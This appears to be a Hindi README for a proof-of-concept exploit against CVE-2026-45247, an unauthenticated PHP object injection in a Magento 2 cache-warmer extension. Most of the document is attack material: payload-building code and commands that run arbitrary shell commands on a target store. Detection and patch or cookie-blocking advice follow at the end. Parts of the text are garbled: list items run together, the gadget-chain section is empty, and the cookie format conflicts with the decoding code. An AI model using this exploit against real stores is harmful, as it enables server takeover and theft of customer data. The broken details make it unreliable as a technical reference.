
कार्यात्मक PoC CVE-2026-45247: Mirasvit Full Page Cache (Magento 2) में बिना प्रमाणीकरण के PHP Object Injection से RCE।
CVE-2026-45247 Magento 2 और Adobe Commerce के लिए Mirasvit Full Page Cache Warmer एक्सटेंशन में एक गंभीर PHP ऑब्जेक्ट इंजेक्शन भेद्यता है। एक अप्रमाणित हमलावर CacheWarmer कुकी में एक हेरफेर किए गए सीरियलाइज़्ड PHP ऑब्जेक्ट भेजकर रिमोट कोड निष्पादन (RCE) प्राप्त कर सकता है।
यह भेद्यता PHP के मूल unserialize() फ़ंक्शन के अप्रतिबंधित कॉल में निहित है, जो Magento और उसकी निर्भरताओं (विशेष रूप से Monolog) में उपलब्ध गैजेट श्रृंखलाओं (gadget chains) के साथ संयुक्त है।
| गुण | मान |
|---|---|
| CVE | CVE-2026-45247 |
| उत्पाद | Magento 2 के लिए Mirasvit Full Page Cache Warmer |
| प्रभावित संस्करण | 1.11.12 से पहले के सभी संस्करण |
| उपलब्ध पैच | संस्करण 1.11.12 (25 मई 2026) |
| CVSS स्कोर | 9.8 (गंभीर) |
| वेक्टर | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CISA KEV में स्थिति | सक्रिय शोषण की पुष्टि (03/06/2026 को जोड़ा गया) |
| अंतिम तिथि | 06/06/2026 |
CacheWarmer कुकी को हर स्टोर अनुरोध पर प्रोसेस करता हैunserialize() को पास किया जाता हैSyslogUdpHandler, BufferHandler, FingersCrossedHandler) का उपयोग करके RCE प्राप्त किया जाता है# जाँच करें कि स्टोर Mirasvit Cache Warmer का उपयोग करता है या नहीं
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md
# कुकी बिना प्रमाणीकरण के प्रत्येक अनुरोध पर प्रोसेस की जाती है
# Mirasvit में भेद्य कोड:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue)); # खतरा!
# दुर्भावनापूर्ण कुकी का निर्माण
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"
# अनुरोध भेजना
requests.get(target, cookies={'CacheWarmer': cookie_value})
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests
# भेद्यता की जाँच करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only
# 'id' कमांड निष्पादित करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"
# कस्टम कमांड निष्पादित करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"
# डिबगिंग के लिए प्रॉक्सी का उपयोग करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080
# bash स्क्रिप्ट से जाँच करें
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com
एक्सेस लॉग में:
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+
शोषण में देखे गए कमांड:
echo PWNED_CVE2026_$(date +%s)
sleep 5
उपयोग की गई गैजेट श्रृंखलाएँ:
# पैच संस्करण में अद्यतन करें
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush
# .htaccess या nginx में CacheWarmer कुकी को ब्लॉक करें
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
// app/code/local/Custom/BlockCookie.php में
if (isset($_COOKIE['CacheWarmer'])) {
unset($_COOKIE['CacheWarmer']);
}